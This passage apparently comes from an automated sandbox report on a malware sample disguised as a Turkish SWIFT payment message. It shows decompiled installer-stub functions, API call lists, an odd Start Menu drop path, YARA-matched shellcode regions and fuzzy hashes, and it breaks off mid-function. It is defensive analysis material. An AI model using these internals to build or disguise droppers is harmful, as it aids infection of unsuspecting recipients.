								if(GetDiskFreeSpaceW(0x42b218,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x42b218) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x42b218,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405B9F(0x42b218);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x42b218) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404B83(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x433ebc + 0x10)) != _t158) {
									E00404B6B(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x42b208);
									} else {
										E00404AA2(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x434fa4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404239(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42d238 == _t158) {
									E0040463F();
								}
								 *0x42d238 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x42d248;
							_v60 = E00404A3C;
							_v56 = _t146;
							_v68 = E004062A4(_t146, 0x42d248, _t167, 0x42ba20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405B53(_t146);
								_t125 =  *((intOrPtr*)( *0x434ef4 + 0x11c));
								if( *((intOrPtr*)( *0x434ef4 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra") {
									E004062A4(_t146, 0x42d248, _t167, 0, _t125);
									if(lstrcmpiW(0x432e80, 0x42d248) != 0) {
										lstrcatW(_t146, 0x432e80);
									}
								}
								 *0x42d238 =  *0x42d238 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405BCA(_t146) != 0 && E00405BFE(_t146) == 0) {
						E00405B53(_t146);
					}
					 *0x433eb8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404217(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404217(_t167);
					E0040424C(_t166);
					_t138 = E0040665C(7);
					if(_t138 == 0) {
						L53:
						return E0040427E(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x004046e6
0x004046ec
0x004046f2
0x004046ff
0x0040470d
0x00404710
0x00404718
0x0040471e
0x0040471e
0x0040472a
0x0040472d
0x0040479b
0x004047a2
0x00404879
0x00404880
0x0040488f
0x0040488f
0x00404893
0x0040489d
0x004048aa
0x004048ac
0x004048ac
0x004048ba
0x004048c1
0x004048c8
0x004048cb
0x00404907
0x00404909
0x0040490f
0x00404914
0x00404918
0x0040491a
0x0040491a
0x00404936
0x00000000
0x00404938
0x0040493b
0x00404949
0x0040494f
0x00404950
0x00404953
0x00404956
0x00000000
0x00404956
0x004048cd
0x004048cf
0x004048d3
0x00000000
0x00000000
0x00000000
0x00000000
0x004048d5
0x004048d5
0x004048e2
0x004048e7
0x00000000
0x00000000
0x004048eb
0x004048ed
0x004048ed
0x004048f6
0x004048f8
0x004048fd
0x00404900
0x00404905
0x00000000
0x00000000
0x00000000
0x00000000
0x00404905
0x00404962
0x0040496c
0x0040496f
0x00404972
0x00404979
0x00404979
0x0040497b
0x0040497b
0x00404980
0x00404982
0x0040498a
0x00404991
0x00404993
0x0040499e
0x0040499e
0x00404993
0x004049ae
0x004049b8
0x004049c0
0x004049db
0x004049c2
0x004049cb
0x004049cb
0x004049c0
0x004049e0
0x004049e5
0x004049ea
0x004049f3
0x004049f3
0x004049fc
0x004049fe
0x004049fe
0x00404a0a
0x00404a12
0x00404a1c
0x00404a1c
0x00404a21
0x00000000
0x00404a21
0x004048cb
0x00404882
0x00404889
0x00000000
0x00000000
0x00000000
0x00404889
0x004047a8
0x004047b1
0x004047cb
0x004047d0
0x004047da
0x004047e1
0x004047ed
0x004047f0
0x004047f3
0x004047fa
0x00404802
0x00404805
0x00404809
0x00404810
0x00404818
0x00404872
0x0040481a
0x0040481b
0x00404822
0x0040482c
0x00404834
0x00404841
0x00404855
0x00404859
0x00404859
0x00404855
0x0040485e
0x0040486b
0x0040486b
0x00404818
0x00000000
0x004047d0
0x004047be
0x00000000
0x00000000
0x004047c4
0x00000000
0x0040472f
0x0040473c
0x00404745
0x00404752
0x00404752
0x00404759
0x0040475f
0x00404768
0x0040476b
0x0040476e
0x00404776
0x00404779
0x0040477c
0x00404782
0x00404789
0x00404790
0x00404a27
0x00404a39
0x00404796
0x00404799
0x00000000
0x00404799
0x00404790

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404735
SetWindowTextW.USER32(00000000,?), ref: 0040475F
SHBrowseForFolderW.SHELL32(?), ref: 00404810
CoTaskMemFree.OLE32(00000000), ref: 0040481B
lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 0040484D
lstrcatW.KERNEL32(?,Call), ref: 00404859
SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040486B

Part of subcall function 004058C8: GetDlgItemTextW.USER32(?,?,00000400,004048A2), ref: 004058DB

Part of subcall function 00406516: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe",0040334E,C:\Users\user\AppData\Local\Temp\,76203420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
Part of subcall function 00406516: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
Part of subcall function 00406516: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe",0040334E,C:\Users\user\AppData\Local\Temp\,76203420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
Part of subcall function 00406516: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe",0040334E,C:\Users\user\AppData\Local\Temp\,76203420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0

GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040492E
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404949

Part of subcall function 00404AA2: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
Part of subcall function 00404AA2: wsprintfW.USER32 ref: 00404B4C
Part of subcall function 00404AA2: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra, xrefs: 00404836
A, xrefs: 00404809
Call, xrefs: 00404847, 0040484C, 00404857

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra$Call
API String ID: 2624150263-2258434197
Opcode ID: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
Instruction ID: b9cd804fa769b9c0a994065299bacf789a546679ae48146ccc486c737bfd155f
Opcode Fuzzy Hash: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
Instruction Fuzzy Hash: CBA175F1A00209ABDB11AFA5CD41AAFB7B8EF84354F10847BF601B62D1D77C99418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 02AF8878 Relevance: 6.6, Strings: 5, Instructions: 379COMMON

Download Yara Rule

Strings

]91, xrefs: 02AF8EE5
<n, xrefs: 02AF8EC4
$i7, xrefs: 02AF8C71
>Z$, xrefs: 02AF8938
Yi5;, xrefs: 02AF8D8B

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: $i7$<n$Yi5;$>Z$$]91
API String ID: 0-4038868138
Opcode ID: 20f00fbd81bdd5779bdc30f3db693f2d4cdda15ec020da0cab8e3df59d6a71dc
Instruction ID: eeb3e038b6840e316a3cd4ed87e78bab14203e7dbdb4f7909865d5b8315bb057
Opcode Fuzzy Hash: 20f00fbd81bdd5779bdc30f3db693f2d4cdda15ec020da0cab8e3df59d6a71dc
Instruction Fuzzy Hash: 2DD1697260438A8FDF309E68C9913DF77B7AF95350F95841EEC8A9B204D7388986CB15

Uniqueness

Uniqueness Score: -1.00%

Function 02AF8890 Relevance: 6.6, Strings: 5, Instructions: 323COMMON

Download Yara Rule

Strings

]91, xrefs: 02AF8EE5
<n, xrefs: 02AF8EC4
$i7, xrefs: 02AF8C71
>Z$, xrefs: 02AF8938
Yi5;, xrefs: 02AF8D8B

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: $i7$<n$Yi5;$>Z$$]91
API String ID: 0-4038868138
Opcode ID: 8645c4c3611255b27e1ad738af00da3c78770a9c68c7948284010ccfd79e2719
Instruction ID: b9f9339f6d7a0a2ea2069c5a027ec8e66132a6b4493756a75a3716900cb318ad
Opcode Fuzzy Hash: 8645c4c3611255b27e1ad738af00da3c78770a9c68c7948284010ccfd79e2719
Instruction Fuzzy Hash: 5EC15A726043468FDF309E68C9903DF77B7AF95790F95442EEC8A97208D7348986CB05

Uniqueness

Uniqueness Score: -1.00%

Function 02AF892E Relevance: 5.3, Strings: 4, Instructions: 301COMMON

Download Yara Rule

Strings

]91, xrefs: 02AF8EE5
<n, xrefs: 02AF8EC4
$i7, xrefs: 02AF8C71
Yi5;, xrefs: 02AF8D8B

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: $i7$<n$Yi5;$]91
API String ID: 0-1988322869
Opcode ID: 45f615071cda2c499db58696280c8fce3ad8185db687715839af9696dad3b20b
Instruction ID: a1f7c1a79f287c9c773d74faa4d5e1d871911f2c091ee7528c6c63ee308ca72d
Opcode Fuzzy Hash: 45f615071cda2c499db58696280c8fce3ad8185db687715839af9696dad3b20b
Instruction Fuzzy Hash: 56A149765443469FDF709E68CCA07EF37A7AF95350F91812AEC89D7204DB388A86CB11

Uniqueness

Uniqueness Score: -1.00%

Function 02AF8983 Relevance: 5.3, Strings: 4, Instructions: 288COMMON

Download Yara Rule

Strings

]91, xrefs: 02AF8EE5
<n, xrefs: 02AF8EC4
$i7, xrefs: 02AF8C71
Yi5;, xrefs: 02AF8D8B

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: $i7$<n$Yi5;$]91
API String ID: 0-1988322869
Opcode ID: 8f858f3553147d8999652260aab7764f7c037797076c67fa39dc693bab758dec
Instruction ID: 3e21f930d0ff1060c1472b5d37777826c1923326ed9005a4c96793b7433306cd
Opcode Fuzzy Hash: 8f858f3553147d8999652260aab7764f7c037797076c67fa39dc693bab758dec
Instruction Fuzzy Hash: 5EA127756443469FDF709E68CCA07EF37A7AF95350F91812AEC89D7204DB388A86CB11

Uniqueness

Uniqueness Score: -1.00%

Function 02AF89FA Relevance: 5.3, Strings: 4, Instructions: 278COMMON

Download Yara Rule

Strings

]91, xrefs: 02AF8EE5
<n, xrefs: 02AF8EC4
$i7, xrefs: 02AF8C71
Yi5;, xrefs: 02AF8D8B

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: $i7$<n$Yi5;$]91
API String ID: 0-1988322869
Opcode ID: 6706eb89b5e4c922cc9be1f13c3029c502f88e2c332ca4f4534ea3a85bba4e2f
Instruction ID: ef076324a5e0a358a316587037cc725a7598cb17cafc55e435c1986b70cc609b
Opcode Fuzzy Hash: 6706eb89b5e4c922cc9be1f13c3029c502f88e2c332ca4f4534ea3a85bba4e2f
Instruction Fuzzy Hash: FEA16A726043998FDF309E68C9903EF77B7AF95760F95442EEC8A97208D7348986CB05

Uniqueness

Uniqueness Score: -1.00%

Function 02AF8BF1 Relevance: 5.2, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

]91, xrefs: 02AF8EE5
<n, xrefs: 02AF8EC4
$i7, xrefs: 02AF8C71
Yi5;, xrefs: 02AF8D8B

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: $i7$<n$Yi5;$]91
API String ID: 0-1988322869
Opcode ID: 5e57fc08cef37c4cb93cca541284bf46d42f1bf546a687982a78e6d4a357180c
Instruction ID: 36f02f0c0dfa86fe6372338e0b8465a9c38bbd7f18ad88dcdfa9544254b0a761
Opcode Fuzzy Hash: 5e57fc08cef37c4cb93cca541284bf46d42f1bf546a687982a78e6d4a357180c
Instruction Fuzzy Hash: 67514F7554038A9FDF34AE68C8A07EF3767AF95750F91442EEC498B304DB388A46CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02AF8C78 Relevance: 3.9, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

]91, xrefs: 02AF8EE5
<n, xrefs: 02AF8EC4
Yi5;, xrefs: 02AF8D8B

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: <n$Yi5;$]91
API String ID: 0-1392330911
Opcode ID: b9f794b8fce392b61c4f707e27cbef8ffcacbe79db1c4230099e2fb8458e0ca5
Instruction ID: 28e2f4c7e3929b836764b7825443b3e83a8786a3697f1cf093f5303104c997b7
Opcode Fuzzy Hash: b9f794b8fce392b61c4f707e27cbef8ffcacbe79db1c4230099e2fb8458e0ca5
Instruction Fuzzy Hash: 4251AB326012998FEF316F7884903DE7777AF95664FC5481EECCA97208E7388985CB15

Uniqueness

Uniqueness Score: -1.00%

Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004020FE() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x4c)) = E00402C37(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x3c)) = E00402C37(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402C37(2);
				 *((intOrPtr*)(_t107 - 0x48)) = E00402C37(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402C37(0x45);
				_t52 =  *(_t107 - 0x18);
				 *(_t107 - 0x44) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x38) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405BCA( *((intOrPtr*)(_t107 - 0x3c))) == 0) {
					E00402C37(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4085e8, _t83, 1, 0x4085d8, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4085f8, _t107 - 0x30);
					 *((intOrPtr*)(_t107 - 0x10)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x3c)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra\\Novelizes");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x38));
						_t91 =  *((intOrPtr*)(_t107 - 0x48));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x44));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x30));
							 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x4c)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x30));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x00402107
0x00402111
0x0040211b
0x00402125
0x00402130
0x00402133
0x0040214d
0x00402150
0x00402156
0x00402159
0x00402163
0x00402167
0x00402167
0x0040216c
0x0040217d
0x00402185
0x0040223c
0x0040223c
0x00402243
0x0040218b
0x0040218b
0x0040219a
0x0040219e
0x004021a1
0x004021a7
0x004021b5
0x004021b8
0x004021ba
0x004021c5
0x004021c5
0x004021ca
0x004021cc
0x004021d3
0x004021d3
0x004021d6
0x004021df
0x004021e2
0x004021e8
0x004021ea
0x004021f4
0x004021f4
0x004021f7
0x00402200
0x00402203
0x0040220c
0x00402212
0x00402214
0x00402222
0x00402222
0x00402225
0x0040222b
0x0040222b
0x0040222e
0x00402234
0x0040223a
0x0040224f
0x00000000
0x00000000
0x00000000
0x0040223a
0x00402245
0x00402ac2
0x00402ace

APIs

CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Novelizes, xrefs: 004021BD

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Novelizes
API String ID: 542301482-3281549536
Opcode ID: 0ef6bbf442897ef527506715e7f738d692543a3abdbaa0dc7b7a5ab61d8902ee
Instruction ID: 2ba5a37aa1c239f751097cd18d9f1051e5d6a8806e2346af1523e8cbd5355f1b
Opcode Fuzzy Hash: 0ef6bbf442897ef527506715e7f738d692543a3abdbaa0dc7b7a5ab61d8902ee
Instruction Fuzzy Hash: 504139B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44

Uniqueness

Uniqueness Score: -1.00%

Function 004072B4 Relevance: 2.8, Strings: 2, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004072B4(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				intOrPtr _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x432170 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x432170;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
